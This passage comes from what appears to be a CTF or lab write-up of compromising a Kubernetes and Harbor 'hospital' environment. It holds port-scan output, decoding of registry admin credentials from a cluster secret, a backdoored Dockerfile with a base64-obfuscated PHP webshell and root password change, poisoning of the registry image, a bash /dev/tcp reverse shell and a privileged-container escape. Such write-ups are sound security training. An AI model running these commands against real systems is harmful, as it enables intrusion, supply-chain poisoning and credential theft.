TX packets 7634 bytes 1230043 (1.1 MiB)



TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0这里同样通过scp传个fscan扫一下172.22.15.75

start infoscan

172.22.15.75:179 open

172.22.15.75:22 open

172.22.15.75:111 open

172.22.15.75:2380 open

172.22.15.75:2379 open

172.22.15.75:5000 open

172.22.15.75:6443 open

172.22.15.75:9253 open

172.22.15.75:9353 open

172.22.15.75:10259 open

172.22.15.75:10249 open

172.22.15.75:10257 open

172.22.15.75:10250 open

172.22.15.75:10256 open

172.22.15.75:10248 open

172.22.15.75:30020 open

172.22.15.75:32686 open

[*] alive ports len is: 17

start vulscan

[*] WebTitle http://172.22.15.75:9253 code:404 len:19 title:None

[*] WebTitle http://172.22.15.75:9353 code:404 len:19 title:None

[*] WebTitle http://172.22.15.75:5000 code:200 len:0 title:None

[*] WebTitle http://172.22.15.75:10248 code:404 len:19 title:None

[*] WebTitle https://172.22.15.75:32686 code:200 len:1422 title:Kubernetes Dashboard

[*] WebTitle http://172.22.15.75:10249 code:404 len:19 title:None

[*] WebTitle http://172.22.15.75:10256 code:404 len:19 title:None

[*] WebTitle https://172.22.15.75:10250 code:404 len:19 title:None

[*] WebTitle https://172.22.15.75:6443 code:401 len:157 title:None

[*] WebTitle https://172.22.15.75:10257 code:403 len:217 title:None

[+] InfoScan https://172.22.15.75:32686 [Kubernetes]

[*] WebTitle https://172.22.15.75:10259 code:403 len:217 title:None

Port 6443 is open. https://172.22.15.75:6443 and the earlier https://10.68.0.1 both point to the Kubernetes API Server; one is the node IP and the other is the Cluster IP. To verify, kubectl can again be given the token directly.

kubectl -s https://172.22.15.75:6443/ --insecure-skip-tls-verify=true --token=eyJhbGci... describe nodes



List all resource types in the cluster. The secrets resource is among them.

kubectl --kubeconfig k8s.yaml api-resources

List the secrets, find the harbor-registry-secret seen earlier in the Dashboard, and print it

kubectl --kubeconfig k8s.yaml get secrets

kubectl --kubeconfig k8s.yaml get secrets harbor-registry-secret

kubectl --kubeconfig k8s.yaml get secret harbor-registry-secret -o jsonpath='{.data.\.dockerconfigjson}'

Base64-decoding the output gives the Harbor admin credentials

{"auths":{"172.22.18.64":{"username":"admin","password":"password@nk9DLwqce","auth":"YWRtaW46cGFzc3dvcmRAbms5REx3cWNl"}}}

Pulling images from the private Harbor registry
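The credentials used for the login below come from the decoded secret shown above. The `auth` field inside that JSON is itself a base64-encoded `username:password` pair, which the following sketch unpacks. It starts from the already decoded JSON (the raw kubectl jsonpath output needs one base64 decode first), and the helper name `registry_credentials` is my own.

```python
import base64
import json

# Decoded .dockerconfigjson content, copied from above.
docker_config = (
    '{"auths":{"172.22.18.64":{"username":"admin",'
    '"password":"password@nk9DLwqce",'
    '"auth":"YWRtaW46cGFzc3dvcmRAbms5REx3cWNl"}}}'
)


def registry_credentials(config_json: str) -> dict:
    """Return {registry: (username, password)} from each entry's auth field."""
    result = {}
    for registry, entry in json.loads(config_json)["auths"].items():
        decoded = base64.b64decode(entry["auth"]).decode()
        username, _, password = decoded.partition(":")
        result[registry] = (username, password)
    return result


creds = registry_credentials(docker_config)
print(creds)
```

Splitting on the first colon only matters when the password itself contains a colon; `partition` handles that case.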

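After logging in, the previously hidden private image repositories become visible.

Pull the hospital/flag image

Before pulling, log in to the registry with docker using these credentials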

proxychains4 -q docker login 172.22.18.64

proxychains4 -q docker pull 172.22.18.64/hospital/flag@sha256:850b67d6a14da0e6ff76c87d9eb3dc6d788090ad5998e8d12244a6e235d3911a

或者



proxychains4 -q docker pull 172.22.18.64/hospital/flag:latestpull的巨巨巨巨巨巨巨巨巨慢,进去拿到第七个flag

flag8



Harbor image synchronization

Next, the logs of the hospital/system image show that admin pulls it at regular intervals.

Back on the master node's host, write a public key

echo -e "\n\nssh-rsa AAAAB3N...kwaQ== root@kali\n\n" >> /simho/root/.ssh/authorized_keys

ssh root@172.22.15.75



An internal IP, 172.22.50.75, shows up. Copy fscan over with scp again and scan the new subnet: 172.22.50.45 hosts a web service.

Pull the hospital/system image locally



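proxychains4 -q docker pull 172.22.18.64/hospital/system:latest

This image also contains a web service. Both the image and the web service on 172.22.50.45 have a p.php file, which strongly suggests that the admin user periodically pulls the image onto that machine.

Create a malicious Dockerfile that does three things

- Write a webshell into the web directory

- Set the SUID bit on the find binary

- Change the root user's password to password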

FROM 172.22.18.64/hospital/system

RUN echo ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+JyA+IC92YXIvd3d3L2h0bWwvc2hlbGwucGhwICYmIGNobW9kIHUrcyAvdXNyL2Jpbi9maW5k | base64 -d | bash && echo password | echo ZWNobyAicm9vdDpwYXNzd29yZCIgfCBjaHBhc3N3ZA== | base64 -d | bash

ENTRYPOINT ["/usr/sbin/apache2ctl", "-D", "FOREGROUND"]

Build an image from this Dockerfile locally, push it to the Harbor registry, and wait for the next pull, which happens every 20 minutes.

proxychains4 -q docker build -t 172.22.18.64/hospital/system .

proxychains4 -q docker push 172.22.18.64/hospital/system

Then connect with AntSword and create a shell script under /tmp that sends a shell back to the master node's host

shell.sh

#!/bin/sh

bash -c "/bin/bash -i >& /dev/tcp/172.22.15.75/4567 0>&1"

Before running it, start a listener on the master node's host. That machine does not seem to have nc, so copy one over with scp first.



/usr/bin/find ./ -exec ./shell.sh \;

Docker privileged escalation

This gives root inside the container. From there, use the privileged-mode escape to reach the host and get the last flag.

cat /proc/self/status | grep -qi "0000003fffffffff" && echo "Is privileged mode" || echo "Not privileged mode"

cat /proc/self/status | grep CapEff

# 0000003fffffffff or 0000001fffffffff

df -h

mkdir /simho

mount /dev/vda3 /simho

cat /simho/flag.txt
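The CapEff value checked above is a bitmask with one bit per Linux capability, so the grep for a fixed string can also be written as a bit test. This is a minimal sketch under assumptions: the helper names are mine, `sample_status` is a hypothetical excerpt of /proc/self/status, and a80425fb is used as an example of the mask commonly seen in a default, non-privileged Docker container.

```python
CAP_SYS_ADMIN = 21  # bit index of CAP_SYS_ADMIN in linux/capability.h


def parse_cap_eff(status_text: str) -> int:
    """Extract the CapEff bitmask from the text of /proc/<pid>/status."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return int(line.split()[1], 16)
    raise ValueError("CapEff line not found")


def has_cap(mask: int, bit: int) -> bool:
    return bool((mask >> bit) & 1)


# Hypothetical excerpt of /proc/self/status, not captured from the target.
sample_status = "Name:\tbash\nCapEff:\t0000003fffffffff\n"

mask = parse_cap_eff(sample_status)
print(bin(mask).count("1"))          # number of capabilities in the mask
print(has_cap(mask, CAP_SYS_ADMIN))  # needed for the mount step above
```

Testing for CAP_SYS_ADMIN directly is a bit more robust than matching the full mask, since the all-ones value differs between kernel versions (which is why the comment above lists two values).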





Topology diagram

Based on the overall environment, I drew a rough topology diagram.
